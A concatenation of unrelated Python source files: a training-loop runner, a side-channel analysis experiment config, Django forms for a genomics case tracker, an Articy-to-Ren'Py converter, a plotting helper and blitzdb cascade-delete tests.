Setter for the runner's device'
"""
if isinstance(value, (str, torch.device)):
self._device = value
else:
raise TypeError(
f"Invalid value type "
f"must be `str` or `torch.device` "
f"got '{type(value)}'"
)
if self._model is not None:
self._model = utils.maybe_recursive_call(
self._model, "to", device=self._device
)
@abstractmethod
def forward(self, batch: Mapping[str, Any], **kwargs) -> Mapping[str, Any]:
"""
Forward method for your Runner
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
"""
pass
def _get_experiment_components(
self, stage: str = None
) -> Tuple[Model, Criterion, Optimizer, Scheduler, Device]:
"""
Inner method for children's classes for model specific initialization.
As baseline, checks device support and puts model on it.
:return:
"""
utils.set_global_seed(self.experiment.initial_seed)
model = self.experiment.get_model(stage)
criterion, optimizer, scheduler = \
self.experiment.get_experiment_components(model, stage)
model, criterion, optimizer, scheduler, device = \
utils.process_components(
model=model,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
distributed_params=self.experiment.distributed_params,
device=self.device
)
return model, criterion, optimizer, scheduler, device
def _prepare_for_stage(self, stage: str):
utils.set_global_seed(self.experiment.initial_seed)
migrating_params = {}
if self.state is not None:
migrating_params.update(
{
"step": self.state.step,
"epoch": self.state.epoch
}
)
utils.set_global_seed(self.experiment.initial_seed)
self.model, criterion, optimizer, scheduler, self.device = \
self._get_experiment_components(stage)
utils.set_global_seed(self.experiment.initial_seed)
self.state = self.state_fn(
stage=stage,
model=self.model,
device=self.device,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
**self.experiment.get_state_params(stage),
**migrating_params
)
utils.set_global_seed(self.experiment.initial_seed)
callbacks = self.experiment.get_callbacks(stage)
loggers = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if isinstance(v, LoggerCallback)
]
)
)
callbacks = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if not isinstance(v, LoggerCallback)
]
)
)
self.state.loggers = loggers
self.loggers = loggers
self.callbacks = callbacks
def _prepare_for_epoch(self, stage: str, epoch: int):
pass
# @TODO: too complicated -> rewrite
def _run_event(self, event: str, moment: Optional[str]):
fn_name = f"on_{event}"
if moment is not None:
fn_name = f"{fn_name}_{moment}"
# before callbacks
if self.state is not None:
getattr(self.state, f"{fn_name}_pre")()
if self.loggers is not None and moment == "start":
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
# running callbacks
if self.callbacks is not None:
for callback in self.callbacks.values():
getattr(callback, fn_name)(self.state)
# after callbacks
if self.loggers is not None and \
(moment == "end" or moment is None): # for on_exception case
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
if self.state is not None:
getattr(self.state, f"{fn_name}_post")()
def _batch2device(self, batch: Mapping[str, Any], device: Device):
output = utils.any2device(batch, device)
return output
def _run_batch_train_step(self, batch: Mapping[str, Any]):
self.state.output = self.forward(batch)
@torch.no_grad()
def predict_batch(
self, batch: Mapping[str, Any], **kwargs
) -> Mapping[str, Any]:
"""
Run model for a batch of elements
WARN: You should not override this method. If you need specific model
call, override forward() method
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
Returns:
model output key-value
"""
batch = self._batch2device(batch, self.device)
output = self.forward(batch, **kwargs)
return output
def _run_batch(self, batch: Mapping[str, Any]):
self.state.step += self.state.batch_size
batch = self._batch2device(batch, self.device)
self.state.input = batch
self.state.timer.stop("_timers/data_time")
self._run_event("batch", moment="start")
self.state.timer.start("_timers/model_time")
self._run_batch_train_step(batch=batch)
self.state.timer.stop("_timers/model_time")
self.state.timer.stop("_timers/batch_time")
self._run_event("batch", moment="end")
def _run_loader(self, loader: DataLoader):
self.state.batch_size = (
loader.batch_sampler.batch_size
if loader.batch_sampler is not None else loader.batch_size
)
self.state.step = (
self.state.step
or self.state.epoch * len(loader) * self.state.batch_size
)
# @TODO: remove time usage, use it under the hood
self.state.timer.reset()
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
for i, batch in enumerate(loader):
self._run_batch(batch)
self.state.timer.reset()
if self._check_run and i >= 2:
break
self.state.timer.start("_timers/batch_time")
self.state.timer.start("_timers/data_time")
def _run_epoch(self, stage: str, epoch: int):
self._prepare_for_epoch(stage=stage, epoch=epoch)
assert self.loaders is not None
loaders = self.loaders
# @TODO: better solution with train/inference handling ?
if not self.state.stage.startswith("infer"):
assert self.state.valid_loader in loaders.keys(), \
f"'{self.state.valid_loader}' " \
f"should be in provided loaders: {list(loaders.keys())}"
else:
assert not any(x.startswith("train") for x in loaders.keys()), \
"for inference no train loader should be passed"
for loader_name, loader in loaders.items():
self.state.loader_name = loader_name
self.state.loader_len = len(loader)
self.state.need_backward = loader_name.startswith("train")
self.model.train(self.state.need_backward)
if isinstance(loader.sampler, DistributedSampler) \
and loader_name.startswith("train"):
loader.sampler.set_epoch(self.state.stage_epoch)
utils.set_global_seed(
self.experiment.initial_seed + self.state.epoch + 1
)
self._run_event("loader", moment="start")
with torch.set_grad_enabled(self.state.need_backward):
self._run_loader(loader)
self._run_event("loader", moment="end")
def _run_stage(self, stage: str):
self._prepare_for_stage(stage)
self._run_event("stage", moment="start")
for epoch in range(self.state.num_epochs):
self.state.stage_epoch = epoch
self._run_event("epoch", moment="start")
self._run_epoch(stage=stage, epoch=epoch)
self._run_event("epoch", moment="end")
if self._check_run and self.state.stage_epoch >= 2:
break
if self.state.early_stop:
self.state.early_stop = False
break
self.state.epoch += 1
self._run_event("stage", moment="end")
def run_experiment(self, experiment: _Experiment, check: bool = False):
"""
Starts the experiment
"""
self._check_run = check
self.experiment = experiment
# jupyter source code logging hack
# + hack to prevent cycle imports
# @TODO: remove hack to catalyst.dl only, not core
# from catalyst.dl.experiment import BaseExperiment
# if isinstance(self.experiment, BaseExperiment) \
# and self.experiment.logdir is not None:
# expdir = Path(os.getcwd())
# logdir = Path(self.experiment.logdir)
# utils.dump_base_experiment_code(expdir, logdir)
try:
for stage in self.experiment.stages:
self._run_stage(stage)
except (Exception, KeyboardInterrupt) as ex:
# if an exception had been raised
# before the exception-handlers were initialized
if self.loggers is None or self.callbacks is None:
raise ex
else:
self.state.exception = ex
self._run_event("exception", moment=None)
return self
__all__ = ["_Runner"]
|
py | 1a3f75621fa9836999669f720440d0b804ee193a | from sklearn import preprocessing
from . import state_space_parameters as ssp
import countermeasures.data_loader as data_loader
import numpy as np
import tensorflow as tf
MODEL_NAME = 'CHES_CTF_HW'
# Number of output neurons
NUM_CLASSES = 9 # Number of output neurons
# Input Size
INPUT_SIZE = 2200
# Batch Queue parameters
TRAIN_BATCH_SIZE = 400 # Batch size for training (scaled linearly with number of gpus used)
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 45000 # Number of training examples
VALIDATION_FROM_ATTACK_SET = True
EVAL_BATCH_SIZE = TRAIN_BATCH_SIZE # Batch size for validation
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 2500 # Number of validation examples
MAX_EPOCHS = 50 # Max number of epochs to train model
# Training Parameters
OPTIMIZER = 'Adam' # Optimizer (should be in caffe format string)
MAX_LR = 5e-3 # The max LR (scaled linearly with number of gpus used)
# Bulk data folder
BULK_ROOT = '/tudelft.net/staff-bulk/ewi/insy/CYS/spicek/jrijsdijk/rl-paper/CHES_CTF/cm_experiment_hw/'
DATA_ROOT = BULK_ROOT + '../data/'
# Trained model dir
TRAINED_MODEL_DIR = BULK_ROOT + 'trained_models'
DB_FILE = DATA_ROOT + 'ches_ctf.h5'
(TRAIN_TRACES, TRAIN_DATA), (ATTACK_TRACES, ATTACK_DATA) = data_loader.load_ches_hd5(
DB_FILE,
'/Profiling_traces/traces', '/Profiling_traces/metadata',
'/Attack_traces/traces', '/Attack_traces/metadata'
)
TRAIN_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'train_labels.npy')])
ATTACK_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'attack_labels.npy')])
NOISE_SCALE = data_loader.get_noise_scale(TRAIN_TRACES)
USE_OCLR = True
MODEL_PREPROCESSING = [
preprocessing.StandardScaler()
]
MODEL_LAYERS = [
tf.keras.layers.Conv1D(4, 100, kernel_initializer='he_uniform', activation='selu', padding='same'),
tf.keras.layers.AveragePooling1D(4, strides=4),
tf.keras.layers.Flatten(name='flatten'),
tf.keras.layers.Dense(15, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'),
tf.keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
KEY = np.load(DATA_ROOT + 'attack_key.npy')
ATTACK_KEY_BYTE = 0
ATTACK_PRECOMPUTED_BYTE_VALUES = np.array(
[[bin(x).count("1") for x in row] for row in
np.load(DATA_ROOT + f'attack_precomputed_byte{ATTACK_KEY_BYTE}_values.npy')]
)
TRACES_PER_ATTACK = 2000 # Maximum number of traces to use per attack
NUM_ATTACKS = 100 # Number of attacks to average the GE over
|
py | 1a3f75aa42b53a347e1cf5cc2950a9abd0fddfff | """Copyright (c) 2018 Great Ormond Street Hospital for Children NHS Foundation
Trust & Birmingham Women's and Children's NHS Foundation Trust
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from datetime import datetime
from django import forms
from django.contrib.auth.models import User
from django.forms import HiddenInput, Textarea, CheckboxInput, Select, ModelChoiceField
from django.forms import BaseFormSet
from .models import *
class UserForm(forms.ModelForm):
"""
User registration form
"""
password = forms.CharField(widget=forms.PasswordInput())
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'))
role = forms.ChoiceField(choices=role_choices)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = User
fields = ('first_name', 'last_name', 'email', 'password')
class ProfileForm(forms.Form):
"""
Allows users to change their info.
TODO - Remove this as could be security risk if 2 permission layers are introduced
"""
role_choices = (('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff'),
('Unknown', 'Unknown'),)
role = forms.ChoiceField(choices=role_choices, required=False)
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class ProbandForm(forms.ModelForm):
'''
Form used for allowing users edit proband information
'''
class Meta:
model = Proband
fields = ['outcome', 'comment']
widgets = {
'outcome': Textarea(attrs={'rows': '3'}),
'comment': Textarea(attrs={'rows': '3'}),
}
class VariantValidationForm(forms.ModelForm):
"""
Form used to change values used for variant validation tracking.
"""
def __init__(self, *args, **kwargs):
super(VariantValidationForm, self).__init__(*args, **kwargs)
self.fields['validation_responsible_user'].required=False
class Meta:
model = ProbandVariant
fields = [
'validation_status',
'validation_responsible_user',
]
class AddCommentForm(forms.ModelForm):
'''
Adds a new CaseComment in the Proband page
'''
class Meta:
model = CaseComment
fields = ['comment']
class GELIRForm(forms.ModelForm):
'''
Form used for allowing users edit proband information
'''
class Meta:
model = GELInterpretationReport
fields = ['case_status', 'mdt_status', 'pilot_case', 'case_sent', 'no_primary_findings', 'case_code']
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.mdt_status = data['mdt_status']
gelir.pilot_case = data['pilot_case']
gelir.case_sent = data['case_sent']
gelir.no_primary_findings = data['no_primary_findings']
gelir.case_code = data['case_code']
gelir.save(overwrite=True)
class RelativeForm(forms.ModelForm):
'''
Form used for allowing users edit Relative demographics
'''
class Meta:
model = Relative
fields = ['forename', 'surname', 'date_of_birth', 'nhs_number',
'sex', 'affected_status']
class DemogsForm(forms.ModelForm):
'''
Form used for allowing users edit proband demographics
'''
class Meta:
model = Proband
fields = ['nhs_number', 'lab_number', 'forename', 'surname', 'date_of_birth', 'sex', 'local_id', 'gmc']
class PanelForm(forms.Form):
'''
Form used for allowing users to add a panel to a proband
'''
panel = forms.ModelChoiceField(queryset=PanelVersion.objects.order_by('panel'))
class ClinicianForm(forms.Form):
'''
Form used for allowing users to change a probands clinician
'''
clinician = forms.ModelChoiceField(queryset=Clinician.objects.filter(added_by_user=True).order_by('name'))
class AddClinicianForm(forms.ModelForm):
'''
Form used in Proband View to allow users add a new Clinician
'''
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
class Meta:
model = Clinician
fields = ['name', 'hospital', 'email']
class UserChoiceField(ModelChoiceField):
def label_from_instance(self, obj):
return "%s %s" % (obj.first_name, obj.last_name)
class CaseAssignForm(forms.ModelForm):
'''
Form for specifying which user a case is assigned to
'''
assigned_user = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["assigned_user"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.assigned_user = data['assigned_user']
gelir.save(overwrite=True)
class FirstCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the first check
'''
first_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["first_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.first_check = data['first_check']
gelir.save(overwrite=True)
class SecondCheckAssignForm(forms.ModelForm):
'''
Form for specifying which user performed the second check
'''
second_check = UserChoiceField(queryset=User.objects.all().order_by('first_name'))
class Meta:
model = GELInterpretationReport
fields = ["second_check"]
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.second_check = data['second_check']
gelir.save(overwrite=True)
class MdtForm(forms.ModelForm):
'''
Form which edits MDT instance specific fields such as date and status
'''
class Meta:
model = MDT
fields = ['description', 'date_of_mdt', 'status', 'sent_to_clinician']
class MdtSentToClinicianForm(forms.ModelForm):
'''
Form for recording the whether the MDT list has been sent to the clinician
'''
class Meta:
model = MDT
fields = ['sent_to_clinician']
def __init__(self, *args, **kwargs):
super(MdtSentToClinicianForm, self).__init__(*args, **kwargs)
self.fields['sent_to_clinician'].required = False
class ProbandMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = Proband
fields = ('discussion', 'action')
widgets = {
'discussion': Textarea(attrs={'rows': '3'}),
'action': Textarea(attrs={'rows': '3'}),
}
class GELIRMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in proband textfields
'''
class Meta:
model = GELInterpretationReport
fields = ('case_status',)
def __init__(self, *args, **kwargs):
super(GELIRMDTForm, self).__init__(*args, **kwargs)
self.fields['case_status'].required = False
def save(self):
gelir = self.instance
data = self.cleaned_data
gelir.case_status = data['case_status']
gelir.save(overwrite=True)
class RareDiseaseMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in exit questionaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = RareDiseaseReport
fields = (
'contribution_to_phenotype', 'change_med',
'clinical_trial', 'requires_validation',
'discussion', 'action',
'inform_reproductive_choice', 'surgical_option',
'add_surveillance_for_relatives',
'classification', 'id',)
widgets = {
'id': HiddenInput(),
'surgical_option': CheckboxInput(),
'requires_validation': Select(),
'change_med': CheckboxInput(),
'add_surveillance_for_relatives': CheckboxInput(),
'clinical_trial': CheckboxInput(),
'inform_reproductive_choice': CheckboxInput(),
'discussion': Textarea(attrs={'rows': '4'}),
'action': Textarea(attrs={'rows': '4'})
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(RareDiseaseMDTForm, self).save(commit=commit)
class CancerMDTForm(forms.ModelForm):
'''
Form used in Proband View at MDT which allows users to fill in exit questionaire questions
'''
requires_validation = forms.ChoiceField(
choices=(
('U', 'Unknown'),
('A', 'Awaiting Validation'),
('K', 'Urgent Validation'),
('I', 'In Progress'),
('P', 'Passed Validation'),
('F', 'Failed Validation'),
('N', 'Not Required'),
)
)
class Meta:
model = CancerReport
fields = ('variant_use', 'action_type', 'validated',
'validated_assay_type',
'classification', 'id',)
widgets = {'id': HiddenInput(),
'validated': CheckboxInput(),
}
def save(self, commit=True):
selected_validation_status = self.cleaned_data['requires_validation']
pv = self.instance.proband_variant
pv.validation_status = selected_validation_status
if not pv.validation_datetime_set:
pv.validation_datetime_set = datetime.now()
pv.save()
return super(CancerMDTForm, self).save(commit=commit)
class AddNewAttendee(forms.Form):
'''
Form for allowing users to add new attendee which would then be inserted into CS, Clinician or OtherStaff table
'''
name = forms.CharField()
config_dict = load_config.LoadConfig().load()
if config_dict['GMC'] != 'None':
choices = config_dict['GMC'].split(',')
gmc_choices = []
for choice in choices:
choice = choice.strip(' ')
gmc_choices.append((choice, choice))
hospital = forms.ChoiceField(choices=gmc_choices)
else:
hospital = forms.CharField()
email = forms.EmailField()
role = forms.ChoiceField(choices=(('Clinician', 'Clinician'),
('Clinical Scientist', 'Clinical Scientist'),
('Other Staff', 'Other Staff')))
class AddVariantForm(forms.ModelForm):
'''
Allows users to add a variant to a report. Users have to enter
chromosome, position, reference, alternate, dbsnp
TODO should check everything users enters for consistancy
'''
def clean_reference(self):
data = self.cleaned_data['reference'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
def clean_alternate(self):
data = self.cleaned_data['alternate'].strip()
if not all([f in ['A', 'T', 'G', 'C'] for f in data]):
raise forms.ValidationError("Not DNA sequence")
else:
return data
class Meta:
model = Variant
fields = ['chromosome',
'position',
'reference',
'alternate',
'db_snp_id']
widgets = {'reference': Textarea(attrs={'rows': '2'}),
'alternate': Textarea(attrs={'rows': '2'})}
class GenomicsEnglandform(forms.Form):
""" Form for entering genomics england information to render a report to be used by the scientists """
interpretation_id = forms.IntegerField(label='Interpretation ID')
# Version number of the interpretation
ir_version = forms.IntegerField(label='Version')
report_version = forms.IntegerField(label='Clinical Report Version')
class GeneSearchForm(forms.Form):
gene = forms.CharField(max_length=25, widget = forms.TextInput(attrs={'style': 'width:200px'}))
class AddCaseAlert(forms.ModelForm):
def clean_gel_id(self):
if self.cleaned_data['gel_id'].isdigit() and len(self.cleaned_data['gel_id']) >= 8:
return self.cleaned_data['gel_id'].strip()
else:
forms.ValidationError("Doesn't look like a GELID")
class Meta:
model = CaseAlert
fields = ['gel_id', 'comment', 'sample_type']
|
py | 1a3f75cb101ec6ef6fd9b41a170a98b7797fecf6 | import argparse
import json
from ArticyCoreClass import ArticyCore
from ArticyCoreClass import Character
from ArticyCoreClass import FlowFrag
from ArticyCoreClass import Episode
from ArticyCoreClass import Scene
from ArticyCoreClass import Dialog
from ArticyCoreClass import Condition
from ArticyCoreClass import Instruction
from ArticyCoreClass import Snippet
from ArticyCoreClass import Code
from ArticyCoreClass import Game
from ArticyCoreClass import Hub
parser = argparse.ArgumentParser(description='Convert the JSON file from Articy to a Renpy file')
parser.add_argument('-i', required=True, help='JSON file created by Articy (required)')
parser.add_argument('-o', required=False, help='Renpy file created from the JSON file')
args = parser.parse_args()
#print(args)
#print(args.i)
#-------------------------------------------------------------------------------
f = open(args.i)
data = json.load(f)
f.close()
TheGame: Game = None
Characters = []
FlowFrags = []
Episodes = []
Scenes = []
Dialogs = []
Conditions = []
Snippets = []
Codes = []
Instructions = []
Hubs = []
#-------------------------------------------------------------------------------
# parse the JSON file, building up internal data structures
for package in data['Packages']:
for model in package['Models']:
if model['Type']=='DialogueFragment':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
dialog = Dialog(properties['Id'], properties['Parent'], properties['MenuText'], properties['StageDirections'], properties['Speaker'], properties['Text'], outputs)
Dialogs.append(dialog)
elif model['Type']=='Instruction':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
instruction = Instruction(frag, properties['Expression'])
Instructions.append(instruction)
elif model['Type']=='Condition':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
condition = Condition(frag, properties['Expression'])
Conditions.append(condition)
elif model['Type']=='Hub':
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
hub = Hub(frag, "hub")
Hubs.append(hub)
elif model['Type']=='DefaultMainCharacterTemplate_02':
properties = model['Properties']
color = properties['Color']
template = model['Template']
basic = template['DefaultBasicCharacterFeature_02']
colorR = round(255*color['r'])
colorG = round(255*color['g'])
colorB = round(255*color['b'])
char = Character(properties['Id'], properties['DisplayName'], (colorR, colorG, colorB), basic['AbreviatedName'])
Characters.append(char)
elif (model['Type']=='FlowFragment') or (model['Type']=='Dialogue'):
properties = model['Properties']
outputpins = properties['OutputPins']
outputs = []
for outputpin in outputpins:
if 'Connections' in outputpin:
connections = outputpin['Connections']
for connection in connections:
outputs.append(connection['Target'])
frag = FlowFrag(properties['Id'], properties['DisplayName'], properties['Parent'], properties['Text'], outputs)
FlowFrags.append(frag)
names = frag.Name.split()
if names[0].lower()[:7] == 'episode':
episode = Episode(frag)
Episodes.append(episode)
elif names[0].lower()[:5] == 'scene':
scene = Scene(frag)
Scenes.append(scene)
elif names[0].lower()[:7] == 'snippet':
scene = Snippet(frag)
Snippets.append(scene)
elif names[0].lower()[:4] == 'code':
scene = Code(frag)
Codes.append(scene)
elif names[0].lower()[:4] == 'game':
TheGame = Game(frag)
else:
print('Unhandled ???')
print(model['Type'])
print()
#-------------------------------------------------------------------------------
# For debug purposes, print out the data structures created from parsing the JSON file
print('Characters:')
Characters.sort(key=lambda character: character.Name)
for char in Characters:
print(char)
print()
print('FlowFrags:')
for frag in FlowFrags:
print(frag)
print()
print('Game:')
print(TheGame)
print()
print('Episodes:')
Episodes.sort(key=lambda episode: episode.Num)
for episode in Episodes:
print(episode)
print()
print('Scenes:')
Scenes.sort(key=lambda scene: scene.Num)
for scene in Scenes:
print(scene)
print()
print('Snippets:')
Snippets.sort(key=lambda snippet: snippet.Num)
for snippet in Snippets:
print(snippet)
print()
print('Dialogs:')
for dialog in Dialogs:
# if dialog.StageDirections == 'aurora smirks':
if dialog.StageDirections == 'art sad':
debug = 1
dialog.MakeConnections(Scenes, Characters, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
for dialog in Dialogs:
print(dialog)
print()
def Connections(name, clist: []):
print(name+":")
for citem in clist:
citem.MakeConnections(Scenes, Dialogs, Conditions, Instructions, Codes, Snippets, Hubs)
print(citem)
print()
Connections('Conditions', Conditions)
Connections('Instructions', Instructions)
Connections('Code Blocks', Codes)
Connections('Snippets', Snippets)
Connections('Hubs', Hubs)
#-------------------------------------------------------------------------------
# Now translate the structures into a Ren'Py representation
TheGame.MakeLinkages(Episodes)
print(TheGame.Title())
episode = TheGame.First
while episode != None:
print(' ', episode.Title())
episode.MakeLinkages(Scenes)
scene = episode.First
while scene != None:
print(' ', f"({scene.Prefix()})", scene.Title())
scene = scene.Next()
print()
episode = episode.Next()
print()
for scene in Scenes:
scene.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = scene.CreateRenpyScene()
if len(lines) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
print()
for line in lines:
print(line)
print()
for snippet in Snippets:
snippet.PrepareDialog(Dialogs, Snippets, Conditions, Instructions, Codes)
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
print()
for line in lines:
print(line)
print()
for scene in Scenes:
if len(scene.Images) > 0:
print(f"({scene.Prefix()}) {scene.Title()}")
for imagename in scene.Images:
print(imagename)
print()
for snippet in Snippets:
if len(snippet.Images) > 0:
print(f"({snippet.Prefix()}) {snippet.Title()}")
for imagename in snippet.Images:
print(imagename)
print()
print()
#-------------------------------------------------------------------------------
# write Rnpy code out to the specified file
if args.o != None:
f = open(args.o, "w")
# The code files
for scene in Scenes:
lines = scene.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
for snippet in Snippets:
lines = snippet.CreateRenpyScene()
if len(lines) > 0:
for line in lines:
f.write(f"{line}\n")
f.write("\n")
# List out the images needed
for scene in Scenes:
if len(scene.Images) > 0:
for imagename in scene.Images:
f.write(f"{imagename}\n")
f.write("\n")
for snippet in Snippets:
if len(snippet.Images) > 0:
for imagename in snippet.Images:
f.write(f"{imagename}\n")
f.write("\n")
f.close()
|
py | 1a3f75cbe34eb718ca742b3fb41404b1619b3fb8 | import os
os.system("uvicorn main:app --reload") |
py | 1a3f761b317fe13b8b320a698c7570416e42362d | from typing import Optional
from numbers import Number
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
__all__ = [
'plot',
]
def plot(
df: pd.DataFrame,
*args,
zmin: Optional[Number] = None,
zmax: Optional[Number] = None,
**kwargs,
) -> go.Figure:
if zmin is None:
zmin = -1
if zmax is None:
zmax = 1
return px.imshow(get_lower_correlation_matrix(df), *args, zmin=zmin, zmax=zmax, **kwargs)
def get_lower_correlation_matrix(df: pd.DataFrame) -> pd.DataFrame:
correlation = df.corr()
return correlation.where(np.tril(np.ones(correlation.shape), k=-1).astype(bool))
|
py | 1a3f76c1cb52a245350c7d57afe6d31e12a97086 | import pytest
from sqlalchemy.exc import IntegrityError
from blitzdb import Document
from blitzdb.fields import CharField, ForeignKeyField, ManyToManyField
from ..conftest import _sql_backend, get_sql_engine
class DirectorAward(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
director = ForeignKeyField('Director', backref='awards')
class Actor(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
class Movie(Document):
class Meta(Document.Meta):
autoregister = False
director = ForeignKeyField('Director', backref='movies')
actors = ManyToManyField('Actor', backref='movies')
name = CharField(indexed=True)
class Director(Document):
class Meta(Document.Meta):
autoregister = False
name = CharField(indexed=True)
def _init_backend(backend):
backend.register(Actor)
backend.register(Movie)
backend.register(Director)
backend.register(DirectorAward)
backend.init_schema()
backend.create_schema()
ted_kotcheff = Director({'name': 'Ted Kotcheff'})
silvester_stallone = Actor({'name': 'Silvester Stallone'})
rambo = Movie({'name': 'Rambo I', 'actors': [silvester_stallone], 'director': ted_kotcheff})
oscar = DirectorAward({'name': 'Oscar', 'director': ted_kotcheff})
with backend.transaction():
backend.save(rambo)
backend.save(oscar)
@pytest.fixture
def cascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete='CASCADE')
_init_backend(backend)
return backend
@pytest.fixture
def nocascade_backend(request):
engine = get_sql_engine()
backend = _sql_backend(request, engine, autodiscover_classes=False, ondelete=None)
_init_backend(backend)
return backend
def test_foreign_key_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
director = cascade_backend.get(Director, {})
director.delete()
assert cascade_backend.filter(Actor, {})
assert not cascade_backend.filter(Director, {})
assert not cascade_backend.filter(Movie, {})
assert not cascade_backend.filter(DirectorAward, {})
def test_foreign_key_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
with pytest.raises(IntegrityError):
director.delete()
assert actor in nocascade_backend.filter(Actor, {})
assert director in nocascade_backend.filter(Director, {})
assert movie in nocascade_backend.filter(Movie, {})
def test_many_to_many_delete_cascade(cascade_backend):
movie = cascade_backend.get(Movie, {})
actor = cascade_backend.get(Actor, {})
actor.delete()
assert not cascade_backend.filter(Actor, {})
assert cascade_backend.filter(Movie, {})
def test_many_to_many_delete_nocascade(nocascade_backend):
movie = nocascade_backend.get(Movie, {})
actor = nocascade_backend.get(Actor, {})
director = nocascade_backend.get(Director, {})
